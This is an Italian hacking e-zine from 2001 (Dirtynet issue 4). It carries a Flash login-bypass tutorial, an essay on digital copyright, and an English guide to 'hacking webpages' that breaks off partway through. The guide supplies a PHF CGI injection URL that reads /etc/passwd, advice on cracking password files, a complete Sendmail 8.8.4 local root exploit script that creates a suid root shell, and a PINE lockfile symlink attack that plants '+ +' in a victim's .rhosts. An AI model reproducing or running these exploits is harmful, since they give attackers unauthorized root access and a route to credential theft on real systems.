Copy Link
Add to Bookmark
Report
Dirtynet 004
/ D . i . r . t . y . N . e . t /
/n° 4 /
Rivista mensile/bimensile gratis sulla sicurezza
numero "4" Aprile/Maggio 2001
/Tutti i testi sono sottoposti ad adattamento - sYn /
/Inizio Disclaimer /
Tutto il contenuto di questo file di testo è da ritenersi dannoso quindi non applicabile.
L'utente è pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato
per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo'
modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le
norme l'utente avrà commesso azione illegale. In questo testo è solamente presente
INFORMAZIONE, e l'informazione per legge è LEGALE. Leggendo queste righe tu ACCETTI I
TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella
questo file.
/Fine Disclaimer /
/ website /
http://www.hackersat.com
/email /
sYn - syn@hackersat.com
A[v]a[t]A[r] - avatar@hackersat.com
Jrash - jrash@hackersat.com
Ghent - ghent@hackersat.com
phaet - vesa8_34@yahoo.it
Screenet_it - screener_it@freemail.it
kEwL - kewl@penguinpowered.com
/ascii /
sYn
/staff assemblo /
sYn - A[v]a[t]A[r]
/===========================::=============================::=================/
/ /Indice /Allegati / /
/===========================::=============================::=================/
/800x600 standard full screen /
Indice
Titolo Autore
/Intro /
/Hacking (or coding) /
Flash hacking 1 - Ghent
Copyright Digitale - Mr.A
Hacking webpages - Virtual Circuit & Psychotic
Semplice fake e-mail - sYn
Costruire un bunker linux: Firewalling di base - kEwL
/Hacking satellitare /
Inserimento Zener - sYn
/Mezzing /
Modifica alla Scarabeo (Aprilia) - Jrash
L'inseguimento - Jrash
/Phreaking /
Italian freching - A[v]a[t]A[r]
/Narcoting /
Maria consigli e oltre - phaet
/Illegality /
Come impallare la scuola - sYn
/Miscellanea /
Shell for lamah - Jrash
Test d'inteliggenza! - sYn
/art1 /
L'approccio in rete e more... - sYn
Carnivore Diagnostic Tool - Screener_it
Imapd exploit - SPYRO
/Outro /
Allegati - cartella "=attc="
gh.zip : file compresso contenete materiale prodotto da Ghent; hackerami.swf, pwdgate.fla.
Vedi articolo.
reti.zip : file compresso contenente un file di testo inviato da Ulisses1 for Dn.
LINUS BIN.zip : mitico. Dopo averlo trovato è qui per voi il LINUS BIN MANAGER Ver 3.0.
.....finito il testo. Puoi pubblicare Dn4. (ore 4:30, ultime parole di kEwL a sYn!)
/===========================::=============================::=================/
/ /Intro / sYn /
/===========================::=============================::=================/
Salve ragazzi, finalmente ce la ho fatta! Il mese di Aprile (dolce dormire) è
stato abbastanza stressante da impedirmi di assemblare al meglio il quarto
numero della rivista. Di impegni sono stato colmo e stracolmo.
La mia schifosissima scuola mi ha tenuto impegnato per la costruzione di un sito
personale e fetente! Per la rete ho vagato e vagato senza concludere quasi niente,
ma in conpenso mi sono tolto il lusso di fare delle belle chattate interessanti!
Ogni cosa che facevo, portavo a termine sembrava non conclusa; nella testa mi
girava di tutto; colpa dei miei pensieri che tenevano impegnata perfino la mia
mente! Alcune persone in rete che cercavo non sono riuscite a trovarle...ma adesso
voi penserete su cosa ve ne possa fregare delle mie faccende. Io ve le sto solo
citanto dimostrandovi in che stato ho collaborato. Aspettando le feste di Pasqua ,
che di sicuro non mi procureranno molto tempo libero, sto mettendo a posto
un po' di documenti. Ne approfitto per dirvi che tutti voi potete apportare una
piccola collaborazione scrivendomi e dicendo tutti i lati negativi che hanno riscontrato.
Approposito di email, volevo dirvi una cosa importante: mi SCUSO con tutte le
persone che mi hanno scritto a cui non ho potuto rispondere, data la notevole
quantita' di email che mi stanno arrivando probabilmente nel prossimo numero
della rivista sara' inserita una box mail con le vostre domande postemi..!
Per ora pero' è solo un'idea. Mentre vi sto scrivendo sono appena le 10 pm.
Improvvisamente mi è venuta una voglia pazzesca di suonare un po' con
una piccola tab appena scaricata da Olga (www.olga.net). Raga dato che non so
proprio cosa cavolo dirvi vi faccio ridere un po' (o almeno spero:).
Vi riporto un po' di cazzate che facevamo io e i miei amici in classe vi va?
Ho sentito un Si. Xchè?
Mi sono trovato il diario a 20 centimetri di distanza così ho detto di leggere
cosa scrivevo nelle ore "morte".
Bene iniziamo:
I libri che DOVEVO leggere
Verga - I Malavoglia (infatti la voglia non mio venne proprio!)
Verga - MatroDongesulado (un nome + piccolo?)
Fogazzaro - Piccolo mondo antico (li sa' solo la prof. questi...)
D'Annunzio - Il piacere (ua lo ricordo...sembra strano ma mi sembra che mia
mumy lo aveva letto...)
Pirandello - Il fu Mattia Pascal (un mito..Mattia ???)
Pirandello - Sei personaggi in cerca di autore (Lo faccio io, li pubblico anche!!)
All'1 settembre mi trovo uno skizzo di una sottospecie di cono, con sotto
scritto "Sconto del 75% alla cassa!"....cosa ma ha pensato la mia mente?
...Tutti cercano amici ma nessuno si preoccupa di esserlo!...Bella questa chissa'
che me la ha scritta.
...skizzi a non finire...(quando non portavo i fogli bianchi, praticamente sempre...
...20:30 Matrix su tele+ ( mi so' segnato anche quando lo facevano...ma Matrix? Chi me
lo ha scritto? )
...Comleanno di Nadia...chi se ne frega!...
...portare Dante...
...portare 10.000 £ ...alla faccio che li vado' a scava' i soldi ?
...tag a non finire...
...assemblea... (ma è il mio diario? a sisi è mio...)
...Anche se so che non te ne frega niente, io te lo dico lo stesso: oggi è il mio
compleanno e compio ben 19 anni...questa ragazza mi conosceva bene bene!!!
...Pluto: strudiare l'aulularia (ero fatto mentre scrivevo...)
...(Qui c'è una pagina piena di firme uguali a quelle di mia madre...erano i miei provini!!!)
...Verso la fine sta scritto "E' finita" . MAGARI dicevo ogni volta che la scrutavo.
Prima di lasciarvi volevo ringraziare in particolare phaet e Ghent
che hanno fornito davvero dei bei art.
Mi raccomando...non provate a votare BERLUSCONI !!!!! (lo so non c'entra niente..)
Basta ragazzi.
Mi è venuta una fitta allo stomaco.
Forse è meglio che la finisco....a prop...
Buona lettura!
/===========================::=============================::=================/
/ /Flash hacking 1 / Ghent /
/===========================::=============================::=================/
<hacking/webmastering>
___________________________________
##°°°°°°° FLASH HACKING 1°°°°°°° ##
## Banale Hack di Login in Flash ##
##~~~~~~~~~~ allegati: ~~~~~~~~~~##
## pwdgate.fla - hackerami.swf ##
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Allora, saluti a tutti: si parte con il primo di una (spero) serie di articoli
aventi come tema usi un po' "particolari" di Flash e del suo ActionScript.
Alcune cose potrebbero risultare incomprensibili a chi non usa Flash con un
minimo di dimestichezza, ma d'altro canto sarerebbe assurdo se io mi mettessi
a scrivere un corso di Flash: ce ne sono gia' tantissimi, e sicuramente
scritti da gente piu' esperta di me. Un paio di link? www.html.it, ed il supremo,
incommensurabile (ma in inglese) www.flashkit.com.
Ci tengo a dire che è il primo articolo per questa e-zine del tutto "mio",
niente traduzioni o "cose del genere"... ;)
Allora... partiamo. Un trucchetto veloce veloce.
Se vi trovate davanti ad un login di un sito in Flash, ed il webmaster è un
niubbo fetente :), potrebbe aver protetto una sezione o cos'altro semplicemente
con un banale actionscript del genere
(metto i commenti per chi non conosce il mio amato actionscript di Flash)
***
//(Azioni associate ad un ipotetico bottone "Ok" di login)
on (release) { //all'evento release (il rilascio del clic)
if (password=="pippo") { //se la variabile password (che sara' un textfield)
//è uguale alla stringa "pippo"
gotoAndStop (10); //vai al fotogramma 10 (dove ci sara' la parte protetta)
} else { //altrimenti
nextFrame (); //vai al fotogramma successivo
//(dove ci sara' un messaggio di errore)
}
}
***
Bene, direte voi... ma io come faccio a sapere qual è lo script associato al bottone?
Dovrei avere il sorgente, il .fla... non l'swf "compilato" che vedo nel browser...
...ed invece no, nessun problema.
Esistono dei programmi per estrarre il codice anche dagli swf o che li sproteggono
dalla modifica (un settaggio del publish di Flash consente di proteggere gli swf
dall'importazione), ma noi non avremo bisogno neanche di questo... (e poi io non
ne ho nessuno! Mica scopiazzo, io... sono un designer serio! :P)
Infatti, ed ho provato hackerando un mio stesso filmato, basta aprire gli swf con
un hex editor per vedere una buona parte degli script contenuti, se non tutti (non
mi sono mica messo a confrontare!)
ehehe, avrete ben capito che non ci vuole molto a trovare l'action che ci interessa,
probabilmente bastera' cercare "pwd", "pass" "login" e cose del genere con l'hex editor...
Altro trucco molto semplice: molti niubbi si dimenticando del "play" che compare
cliccando col tasto destro quando si sta visualizzando un .swf : questo comando
manda avanti il movie con una action "play()", e questo puo' essere determinante
in caso di accesso ad una zona protetta: mi spiego meglio.
Ipotizziamo che ci sia il primo fotogramma del movie con il login, il secondo
fotogramma con un messaggio di errore per avvertire che il login non è valido,
ed il terzo fotogramma con la parte "accesso ristretto". Bene, su ogni
fotogramma c'è una action "stop()", che praticamente ferma il movie fotogramma
per fotogramma. Ipotizziamo che all'"Ok" del login ci siano queste azioni:
***
on (release) { //all'evento release (il rilascio del clic)
if (password=="vivaledonne") { //se la variabile password (che sara' un textfield)
//è uguale alla stringa "vivaledonne"
gotoAndStop (2); //vai al fotogramma 3 (la parte protetta)
} else { //altrimenti
nextFrame (); //vai al fotogramma successivo
//(dove ci sara' un messaggio di errore)
}
}
***
Ora, c'è una grossa falla in questo login:
Nel nel frame del messaggio di errore, c'è solo uno Stop che impedisce di andare
avanti ed accedere alla parte protetta... in pratica sbagliando la pwd si ariva al
fotogramma 2, ed il movie si ferma. Ma basta un right-click, e la scelta
di "play" (o "riproduci" nella versione italiana del plugin) per avviare nuovamente
il movie, che andra al fotogramma 3! :)
Banale, eh?
Per evitare questo giochetto, basta spostare il fotogramma "protetto" dalla
posizione 3 alla 4 o magari alla 5, proprio per stare sicuri, ed assegnare ai
fotogrammi vuoti tra quello del messaggio d'errore e quello della parte
protetta (il 3, o il 3 ed il 4 se si è spostato il frame da proteggere nella
posizione 5) l'azione
gotoAndPlay (1);
in modo tale che si venga portati al primo fotogramma del movie se si prova a
mandare in play oltre il secondo fotogramma.
In pratica, si otterra':
Fotogramma 1 - login
frame actions: stop();
- textfield di input con assegnata variabile "password"
- bottone di ok
azioni bottone:
on (release) {
if (password=="vivaledonne") {
gotoAndStop (5);
} else {
nextFrame ();
}
}
Fotogramma 2 - messaggio di errore
frame actions: stop();
- textfield statico contenente messaggio di errore
- bottone per tornare al primo fotogramma, che azzera anche la var "password"
azioni bottone:
on (release) {
password = "";
gotoAndPlay (1);
}
Fotogramma 3 - anti/bypass del login
frame actions: gotoAndPlay (1);
Fotogramma 4 - anti/bypass scaramantico del login
frame actions: gotoAndPlay (1);
Fotogramma 5 - Area protetta
Spero di essere stato chiaro, ma sono sicuro che tutto cio' e' apparso banalissimo a
chi usa Flash.
In allegato il file hackerami.swf, come compito a casa :)
Ho cercato di rendere difficilmente individuabile la pwd, per quanto possibile senza
criptarla con le funzioni che sto facendo (prossimo numero della ezine ;)? ), ma sono
sicuro che la troverete facilmente, riuscendo cosi' a leggere il messaggio protetto da
pwd...ehehe, curiosi?
In caso non ci riusciste, o se vi servono chiarimenti/consigli, vi ricordo la mia email:
ghent@hackersat.com
(naturalmente sapete che dovete aprire l'swf col browser, no? E che ovviamente dovete
avere il plugin di Flash installato? :))
Ok, ora che abbiamo visto come sfruttare questo paio di trucchetti per eventuali
nostre necessita', vediamo invece come preparare un login *sicuro* in Flash.
Il punto debole è che le stringhe delle pwd vengono riportate in chiaro nell'swf,
quindi noi faremo in modo che queste NON ci siano....
Come?
Semplice, usando uno script server side, il quale non viene eseguito in locale come
accade invece coll'swf di Flash.
Direte voi, grazie al kaiser... ma chi li conosce ASP, PHP o C... chi è capace di
preparare un CGI che possa comunicare con Flash? O ancora, anche volendo imparare
a fare qualcosa del genere, chi è che mi compra uno spazio FTP che mi consenta di
usare script server side? E' difficile trovare uno spazio free che lo permetta (se
ne conoscete di affidabili, di corsa a comunicarmeli a ghent@hackersat.com :)).
Beh, io non sono capace di fare un CGI in Perl ne' ho comprato spazio, ma alla
fine 'sto login l'ho fatto decentemente.
Mi sono appoggiato alla "password gate" di BraveNet, (www.bravenet.com), ottimo
sito che offre numerosi servizi free per webmaster. In pratica, dopo aver
sottoscritto a Bravenet, attivato e configurato la password gate (operazioni
banalissime sulle quali non mi vado a dilungare), viene dato un frammento di
codice da inserire nella propria pagina web per far apparire la form di login.
Dico, ma noi siamo gente che incolla frammenti di codice senza capire cosa fanno,
lasciando l'orrendo design standard del login di BraveNet a rovinarci lo stile del sito?
CERTO che no! :)
Login in Flash si è detto, login in Flash sara', Ghent ha parlato! (sono
leciti i "chissenefrega" :))
Andiamo a vedere un esempio di codice fornito da Bravenet per la password gate...
***
<div align="center">
<form action="http://pub41.bravenet.com/passwd/show.php" method="post">
<input type="hidden" name="usernum" value="0123456789" />
<input type="hidden" name="cpv" value="1" />
<table border="0" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><tr>
<table border="0" width="220" bgcolor="#999999" cellpadding="3" cellspacing="1">
<tr bgcolor="#eeeeee"><td align="center" nowrap><FONT face="Arial,Helvetica" size="2">
<b>Enter Password Protected Area</b></font></td></tr>
<tr bgcolor="cornsilk"><td><table border="0" cellpadding="0"><tr>
<td><FONT face="Arial,Helvetica" size="2">User Name:</font></td>
<td width="10"> </td>
<td><input type="text" name="uname" size="15" maxlength="254" /></tr></tr>
<tr bgcolor="cornsilk"><td><FONT face="Arial,Helvetica" size="2">Password:</font></td>
<td width="10"> </td>
<td><input type="password" name="passwd" size="15" maxlength="254" /></td></tr>
<tr bgcolor="cornsilk"><td colspan="3" align="center"><a href="http://www.bravenet.com/"><img src="http://images.bravenet.com/brpics/passwd.gif" border="0" align="center" width="100" height="35" /></a>
<input type="submit" name="submit" value="Login" /></td></tr></table></td></tr>
</table></td></tr></table></form>
</div>
***
bene, in pratica, sintetizzando un po' e sperando che capiate almeno un poko poko di
HTML, si tratta di un form con due campi testo visibili, user e password, e altri
campi nascosti (quelli settati con HIDDEN). Come form action c'è il sending in POST
di queste variabili dei campi testo, nascosti o meno che siano, alla
pagina "http://pub41.bravenet.com/passwd/show.php" che è in pratica l'indirizzo della
pagina PHP che si occupa di verificare se il login mandato (i valori user/pwd immessi
nei campi testo visibili) sono validi per l'accesso ad una determinata pagina che noi
avremo settato nella members area di Bravenet.
Inoltre, c'è un po' di monnezza che non ci interessa: il logo di BraveNet, la centratura,
i colori ed i font.
In pratica le righe chiave sono queste:
***
<form action="http://pub41.bravenet.com/passwd/show.php" method="post">
<input type="hidden" name="usernum" value="0123456789" />
<input type="hidden" name="cpv" value="1" />
<td><input type="text" name="uname" size="15" maxlength="254" /></tr></tr>
<td><input type="password" name="passwd" size="15" maxlength="254" /></td></tr>
***
In teoria, ho pensato io, se faccio mandare queste variabili da Flash e non da HTML,
che se ne frega BraveNet? Ed infatti, per fortuna, è andata cosi' :)
E' bastato preparare un clip di login coi campi testo user/password, per poi settare
delle variabili interne destinate a essere mandate alla pagina PHP di bravenet alla
pressione di un bottone...
Funziona perfettamente... :))
Ecco il codice associato al bottone "OK" contenuto nel movieclip "login", che contiene
a sua volta i campi di input text login/password e le variabili di cui sopra.
//inizio codice
on (release) {
uname = _root.loginclip:userid;
passwd = _root.loginclip:password;
usernum ="1234567890" //vostro identificativo Bravenet
cpv = "1" //ehm, non lo so :)))
getURL ("http://pub41.bravenet.com/passwd/show.php", "_top", "POST");
}
//fine codice
E ora mi direte... "ebbravo, funziona... ma che schifo! La barra di pubblicita' che mi
piazza BraveNet in un frame inferiore è enorme!"
Tsk tsk, nessun problema: basta impostare come pagina di destinazione della gate,
dall'area di manutenzione di BraveNet, non la pagina che volete proteggere ma un
banalissimo documento html di redirect, cosi' preparato:
<!--inizio codice - hackers@ redirect -->
<HTML>
<HEAD>
<TITLE>REDIRECT</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<SCRIPT LANGUAGE="JavaScript">
function Redirect() {
window.open('QUI_LINK_ALLA_PAGINA_CHE_VUOI_PROTEGGERE','_top');
}
</script>
<BODY onload="Redirect()">
</HEAD>
</HTML>
<!--fine codice - hackers@ redirect -->
Semplice, no? Appena caricata la pagina (Body Onload) la funzione Redirect porta alla
pagina che noi si voleva proteggere... importante è il target "_top", che mostra la
pagina a tutto schermo, elimando eventuali frames (e quindi anche la barra di BraveNet).
Vi assicuro che non fa neanche in tempo ad apparire... cmq vi invito, come faccio sempre io,
a "rendere omaggio" a BraveNet per i suoi servizi applicando il bannerino "Proud Member
of BraveNet" sulla homepage... il loro codice standard rovina il design e quindi si
manipola a proprio piacimento, ma un po' di pubblicita' in segno di graditudine è il
caso di fargliela.
Ho preferito lavorare in un moviclip a se' stante e non sulla root del movie per fare
in modo che il clip possa essere facilmente inserito ovunque da chiunque, una volta
modificato...
Potete vedere un esempio di realizzazione pratica nel pwdgate.fla allegato alla ezine,
scopiazzatelo liberamente ma soprattutto cercate di capire come funziona... questa
cosa del mandare variabili da Flash ha numerosissime applicazioni, fidatevi.
Alla prossima, appena ho tempo... speriamo presto... :)
[]_H@_Team_[] Nothing you can contemplate will ever be the same
[]#_Ghent_#[] Every second is a new spark, sets the universe aflame
[][]=====[][] = Iron Maiden- "The WickerMan" =
/===========================::=============================::=================/
/ /Copyright Digitale / Mr.A /
/===========================::=============================::=================/
PS
Norm, sei condannato ad essere messo in CC e a dover leggere l'articolo in anteprima : P
--------------------------------------------------------------------------------
Copyright Digitale
Una domanda da parecchi mesi rotola in giro per la mia testa senza
trovare una risposta soddifacente per quanto butti via una discreta fetta
del mio tempo libero nel cercare una soluzione a questo inghippo. La
domanda in questione riguarda il significato del copyright in un epoca in
cui la copia o la moltiplicazione in serie di ogni tipo di informazione
e di ogni genere di documento, quale che sia il suo formato di
supporto, è di una semplicità imbarazzante oltre che di una economicità
scandalosa. La domanda per la precisione è più di una ed è riassumibile in
poche semplici affermazioni. Ha ancora senso al giorno d'oggi la tutela
del diritto d'autore? è ancora possibile tutelare in maniera
soddisfacente il copyright? Non è forse opportuno rivedere il concetto stesso di
diritto d'autore per adattarlo alla mutata situazione del mercato? Alcune
considerazioni iniziali possono essere utili per capire quanto la
situazione attuale ponga seri proglemi al tentativo di tutelta del diritto
d'autore.
Il costo attuale di un CD ROM vergine si aggira attorno alle 900 L,
quello di un masterizzatore di velocità accettabile attorno alle 300.000
L, giusto per restare nel campo dell'informatica, la loro reperibilità è
estremamente alta visto che un masterizzatore è reperibile in qualunque
negozio di Hardware ed i CD ROM sono acquistabili addirittura al
supermercato. Quindi per chiunque è assolutamente semplice procurarsi i
mezzi attraverso i quali la violazione del copyright per il software è
possibile.Il costo del software più economico, identificabile con i
videogames è ci circa 100.000 L, questo implica che la masterizzazione di 4
videogiochi consente all'utente l'ammortamento della spesa iniziale ed
appunto dalla quarta copia inizia per l'appassionato videogiocatore il
guadagno.Consideriamo ora invece un altro genere di violazione del
copyright che non ha base informatica. E' pratica assai comune tra gli
studenti universitari ed anche tra i giocatori di ruolo la
fotocopiatura dei testi. in questo caso non si è ancora arrivati ad una semplicità
pari a quella delle copie di CD rom, visto che i costi per l'acquisto
delle fotocopiatrici è elevato, ed il costo di una singola fotocopia si
aggira attorno alle 50-60 lire, e questo implica un costo epr ciascun testo
attorno alle 30-40.000 L. Ciononostante questa pratica è ampiamente diffusa
visto i costi spropositati di questi testi. In questo campo inoltre si va
diffondendo la digitalizzaione dei testi tramite scanner e OCR per
rendere piu economica e più facilmente trasmissibile l'informazione.
Ultimo e lampante esmpio è quello della diffusione del formato .mp3 per
l'audio ed ultimamente del formato divX:-) per il video. Questi due generi di
formati consentono una facile trasmissibilità via rete dell'audio e
del video e permettono altresì di immagazzinare una quantità immensa di
dati in uno "spazio" molto piccolo. Visti quindi tutti questi scenari
presenti è abbastanza facile capire che al giorno d'oggi la protezione
del diritto d'autore così come è stata finora intesa non solo non è più
attuabile ma risulta essere spesso priva di senso. Un'obiezione semplice
a questo ragionamente può essere il fatto che comunque per poter avere
copie di un informazione è necessario avere almeno un originale,
ma spesso questo problema è bypassabile con l'osservazione che molte
persone sono disposte a comprare un originale per poi vendere a
prezzi modici grandi quantità di copie per mezzo delle quali ottenere
sostanziosi guadagni. E' altresì comprensibile l'impossibilità di
abolire il diritto d'autore in quanto è necessario per chi dedica tempo alla
produzione di un'informazione o comunque di un'opera d'ingegno venga
ripagato del suo lavoro; è quindi evidente che deve essere modificata
la struttura attuale non solo di leggi e regolamenti ma anche di cultura
che vige attorno al concetto di copyright. E' fondamentale poter
trovare il giusto punto di equilibrio tra la necessità di gudagano del
produttore e la necessità morale della maggior diffusione possibile del prodotto.
Sembra essere questa la questione che dovrebbe interessare chi si
occupa di copyright, invece le leggi ultimamente licenziate in tutto il
mondo vanno verso la repressione della diffuzione dell'informazione nel
tentativo di tutelare una serie di privilegi che la tanto nominata
globalizzazione e la società dell'informazione hanno già abbattuto alle
fondamenta appunto per la stessa loro definizione. E' quindi evidente
come l'esistenza in italia ancora di un organismo quale la SIAE che ha
il monopolio assoluto sulla gestione del diritto d'autore va contro
ogni logica di mercato oltre che di buonsenso. Questa organizzazione si
pone lo scopo di tutelare l'autore di un'opera di ingegno e di tutelare
l'opera stessa da quella che loro definiscono "pirateria" che altro non
è in realtà se non il tentativo di rottura di questo monopolio. La SIAE
obbliga chi vuole tutelare i propri diritti a versare una quota di
iscrizione, oltre che versare una parte dei guadagni alla SIAE stessa; in cambio di
questo l'ente di occupa di andare a cercare le violazioni e di
perseguirle, oltre che di riscuotere per conto dell'autore i diritti. In pratica
l'ente chiede soldi SIA a chi produce SIA a chi consuma, e obbliga
chiunque produce a pubblicare la produzione SOLO se iscritto, infatti in italia
è illegale commercializzare libri, CD, cassette, e qualunque altro
supporto per informazioni senza il mitico bollino SIAE. Questa forma di
protezione poteva avere un senso quando il contatto tra l'autore e
il fruitore dell'opera era impossibile o difficoltoso percui l'autore
non era in grado materialmente di far valere i suoi diritti
direttamente nei confronti dell'utente; allo stato attuale invece avviene esattamente
l'opposto, infatti il contatto tra chi produce e chi consuma è altamente
facilitato dalla rapidità di trasmissione delle informazioni oltre che
dalla rapidità di trasmissione dei mezzi stessi che convogliano le
informazioni; non sarebbe quindi affatto difficile acquistare un libro
direttamente dall'autore e vederselo spedito a casa entro pochi giorni;
questo diminuirebbe i costi, oltre che permettere un maggiore margine
di guadagno all'autore e quindi una dimiuizione sostanziosa dei
prezzi. Questo non servirebbe sicuramente a "blindare" il diritto
d'autore ma aiuterebbe ad una maggiore diffusione di copie "legali". Il
modo migliore per eliminare le violazioni del copyright consiste
sicuramente nell'autenticazione diretta della copia dopo l'acquisto. Ovvero la
copia viene abilitata all'utilizzo mediante un codice unico criptato che
viene fornito su richiesta a seguito dell'acquisto, indi per cui se
l'abilitazione per la medesima copia viene richiesta più di una volta è possibile
anche risalire a colui il quale ha perpetrato la truffa. Questo però va
accompagnato sicuramente da una maggiore accessibilità
all'informazione che allo stato attuale è considerato bene d'elite e quindi
distribuito con parisimonia solo a chi ha i mezzi economici e
culturali per procurarselo. In sintesi ritengo che l'abbattimento delle attuali
barriere formali e burocratiche, unito ad una facilitazione
dell'accesso ai beni sia la strada da perseguire per garantire le necessità di
tutti.
Mi piacrebbe che da questo articolo scaturisse una seria e meditata
discussione sull'argomento in quanto ritengo di non essere riuscito
ad andare sufficentemente a fondo nella questione (principalmente in
quanto non sono un esperto in materia) e che l'ipotesi da me formulata
non sia altro che una delle innumerevoli soluzioni che possono essere
poste al problema, e sicuramente non la migliore.
Mr.A
/===========================::=============================::=================/
/ /Hacking webpages / Virtual Circuit and Psychotic
/===========================::=============================::=================/
Hacking Webpages
The Ultimate Guide
By Virtual Circuit and Psychotic
Well Psychotic wrote one of the most helpful unix text files in cyberspace but
with the mail that we recieved after the release of our famous 36 page Unix
Bible we realised that unix isn't for everybody so we decided that we should
write on another aspect of hacking..... Virtual Circuit and Psychotic is proud
to release, "Hacking Webpages With a few Other Techniques." We will discuss a
few various ways of hacking webpages and getting root. We are also going to
interview and question other REAL hackers on the subjects.
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through anonymous
ftp access into a webpage. First you need learn a little about the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the
part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or
sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file
looks like you should be able to identify a normal encrypted pw from
a shadowed pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is to
download or copy the file. 2. The second step is to find a password cracker
and a dictionary maker. Although it's nearly impossible to find a good cracker
there are a few ok ones out there. I recomend that you look for Cracker Jack,
John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary
maker or a dictionary file... When you start a cracking prog you will be asked
to find the the password file. That's where a dictionary maker comes in. You can
download one from nearly every hacker page on the net. A dictionary maker finds
all the possible letter combinations with the alphabet that you choose(ASCII, caps,
lowercase, and numeric letters may also be added) . We will be releasing our pasword
file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As
far as we know it will be one of the largest in circulation. 3. You then start up the
cracker and follow the directions that it gives you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that everybody
already knows it and most servers have already found out about the bug and fixed it.
But since I have been asked questions about the phf I decided to include it.
The phf technique is by far the easiest way of getting a password
file(although it doesn't work 95% of the time). But to do the phf all you do is
open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get
the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
Telnet and Exploits
Well exploits are the best way of hacking webpages but they are also more complicated
then hacking through ftp or using the phf. Before you can setup an exploit you must
first have a telnet proggie, there are many different clients you can just do a netsearch
and find everything you need.
It's best to get an account with your target(if possible) and view the glitches from the
inside out. Exploits expose errors or bugs in systems and usually allow you to gain root
access. There are many different exploits around and you can view each seperately.
I'm going to list a few below but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
and now on to another exploit. I'm going to display the pine exploit through linux.
By watching the process table with ps to see which users are running PINE, one can
then do an ls in /tmp/ to gather the lockfile names for each user. Watching the
process table once again will now reveal when each user quits PINE or runs out of
unread messages in their INBOX, effectively deleting
the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for
a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's
process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile,
then rm /tmp/.hamors_lockfile.
This was writen by Sean B. Hamor
For this example, hamors is the victim while catluvr
is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
